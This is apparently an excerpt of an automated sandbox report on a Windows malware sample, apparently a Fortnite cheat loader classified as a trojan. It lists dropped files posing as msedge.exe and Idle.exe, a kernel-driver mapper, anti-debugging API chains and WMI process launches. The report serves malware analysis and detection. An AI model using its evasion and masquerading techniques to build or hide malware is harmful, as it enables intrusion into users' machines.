Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DAE680	0_2_00007FF735DAE680
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC1690	0_2_00007FF735DC1690
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC3A70	0_2_00007FF735DC3A70
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DCEA70	0_2_00007FF735DCEA70
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB9250	0_2_00007FF735DB9250
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC2E50	0_2_00007FF735DC2E50
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC5220	0_2_00007FF735DC5220
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB5DF0	0_2_00007FF735DB5DF0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC65D0	0_2_00007FF735DC65D0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DDEDD0	0_2_00007FF735DDEDD0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD0D80	0_2_00007FF735DD0D80
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC5990	0_2_00007FF735DC5990
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB0960	0_2_00007FF735DB0960
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DCA160	0_2_00007FF735DCA160
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB8570	0_2_00007FF735DB8570
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBC550	0_2_00007FF735DBC550
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DA24F0	0_2_00007FF735DA24F0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBF8F0	0_2_00007FF735DBF8F0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DEA0C0	0_2_00007FF735DEA0C0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DCE4B0	0_2_00007FF735DCE4B0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DAF480	0_2_00007FF735DAF480
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBD470	0_2_00007FF735DBD470
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DAB875	0_2_00007FF735DAB875
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBA040	0_2_00007FF735DBA040
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD9C40	0_2_00007FF735DD9C40
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DDD840	0_2_00007FF735DDD840
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DCF040	0_2_00007FF735DCF040
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DD604D	0_2_00007FF735DD604D
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB4820	0_2_00007FF735DB4820
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DBA800	0_2_00007FF735DBA800
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DDA7E0	0_2_00007FF735DDA7E0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DDB3D0	0_2_00007FF735DDB3D0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB8BA0	0_2_00007FF735DB8BA0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DB97A0	0_2_00007FF735DB97A0
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DC0BA0	0_2_00007FF735DC0BA0
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DE848E	12_2_00DE848E
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DE40FE	12_2_00DE40FE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF4088	12_2_00DF4088
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF00B7	12_2_00DF00B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E051C9	12_2_00E051C9
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF7153	12_2_00DF7153
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF62CA	12_2_00DF62CA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DE32F7	12_2_00DE32F7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF43BF	12_2_00DF43BF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E0D440	12_2_00E0D440
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEF461	12_2_00DEF461
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEC426	12_2_00DEC426
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF77EF	12_2_00DF77EF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E0D8EE	12_2_00E0D8EE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DE286B	12_2_00DE286B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E119F4	12_2_00E119F4
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEE9B7	12_2_00DEE9B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF6CDC	12_2_00DF6CDC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DF3E0B	12_2_00DF3E0B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEEFE2	12_2_00DEEFE2
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E04F9A	12_2_00E04F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00438040	19_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042C070	19_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00449070	19_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00401000	19_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040B0E0	19_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040C080	19_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042D150	19_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004491F0	19_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0041F193	19_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00409240	19_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042C243	19_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004492F0	19_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0043E2A0	19_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004012B3	19_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00401359	19_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00416361	19_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042D3CC	19_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004493D0	19_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004483B0	19_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004113BD	19_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00405460	19_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00447429	19_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004094D7	19_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040A4E0	19_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042B490	19_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004074B0	19_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040B570	19_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004366E0	19_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0041D6A0	19_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00449700	19_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004117C0	19_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042F7DB	19_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00408850	19_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00403890	19_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044A8B0	19_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004488B0	19_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00436970	19_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0045392E	19_2_0045392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0041399C	19_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040AA00	19_2_0040AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00427AFB	19_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042BC50	19_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00413CC6	19_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042CCDD	19_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0042CCF5	19_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00429DF2	19_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00437D90	19_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0040CE00	19_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00431E00	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00415EF6	19_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00407EB0	19_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00427F62	19_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00443FA0	19_2_00443FA0
Source: C:\Edge\msedge.exe	Code function: 23_2_00007FFAAB790D80	23_2_00007FFAAB790D80
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 40_2_00007FFAAB780D80	40_2_00007FFAAB780D80
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB790D80	41_2_00007FFAAB790D80
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A0B06	41_2_00007FFAAB7A0B06
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A0FC7	41_2_00007FFAAB7A0FC7
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A177E	41_2_00007FFAAB7A177E
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A11A9	41_2_00007FFAAB7A11A9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7C1225	41_2_00007FFAAB7C1225
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7C97D9	41_2_00007FFAAB7C97D9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7CBF42	41_2_00007FFAAB7CBF42
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7CD30A	41_2_00007FFAAB7CD30A
Source: C:\Edge\msedge.exe	Code function: 42_2_00007FFAAB7A0D80	42_2_00007FFAAB7A0D80
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A0B06	43_2_00007FFAAB7A0B06
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A0FC7	43_2_00007FFAAB7A0FC7
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A177E	43_2_00007FFAAB7A177E
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A11A9	43_2_00007FFAAB7A11A9
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB790D80	43_2_00007FFAAB790D80
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7C1225	43_2_00007FFAAB7C1225
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7C97D9	43_2_00007FFAAB7C97D9
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7CBF42	43_2_00007FFAAB7CBF42
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7CD30A	43_2_00007FFAAB7CD30A
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAB770D80	49_2_00007FFAAB770D80
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAABB62B5A	49_2_00007FFAABB62B5A
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A0B06	54_2_00007FFAAB7A0B06
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A0FC7	54_2_00007FFAAB7A0FC7
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A177E	54_2_00007FFAAB7A177E
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A11A9	54_2_00007FFAAB7A11A9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7C1225	54_2_00007FFAAB7C1225
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7C97D9	54_2_00007FFAAB7C97D9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7CBF42	54_2_00007FFAAB7CBF42
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB790D80	54_2_00007FFAAB790D80

Source: Joe Sandbox View	Dropped File: C:\Edge\msedge.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Idle.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC

Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00DFEC50 appears 56 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00DFF5F0 appears 31 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00DFEB78 appears 39 times
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: String function: 00007FF735DDE9C0 appears 142 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times

Source: WjFdZuSe.log.23.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: onyQOgMn.log.23.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: YlsMudWZ.log.23.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PDYwKARr.log.23.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MsCvKimq.log.23.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: msedge.exe.12.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: physmeme.exe.14.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Idle.exe.23.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WjFdZuSe.log.23.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: onyQOgMn.log.23.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: YlsMudWZ.log.23.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: PDYwKARr.log.23.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MsCvKimq.log.23.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@74/64@22/4

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00DE6C74 GetLastError,FormatMessageW,

12_2_00DE6C74

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF735DD4BF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 19_2_004345E0 CoCreateInstance,

19_2_004345E0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00DFA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

12_2_00DFA6C2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP

Source: C:\Windows\Speech\physmeme.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Idle.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Users\user\AppData\Local\Idle.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03

Source: C:\Edge\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\3htq1mnq

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "

Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxname	12_2_00DFDF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxstime	12_2_00DFDF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: STARTDLG	12_2_00DFDF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: xz	12_2_00DFDF1E

Source: NCTSgL4t0B.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NCTSgL4t0B.exe

ReversingLabs: Detection: 52%

Source: NCTSgL4t0B.exe	String found in binary or memory: Save/Load
Source: NCTSgL4t0B.exe	String found in binary or memory: Save/Load
Source: NCTSgL4t0B.exe	String found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: clsDriver Error Contact Support. Driver Found Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too long:

Source: unknown	Process created: C:\Users\user\Desktop\NCTSgL4t0B.exe "C:\Users\user\Desktop\NCTSgL4t0B.exe"
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
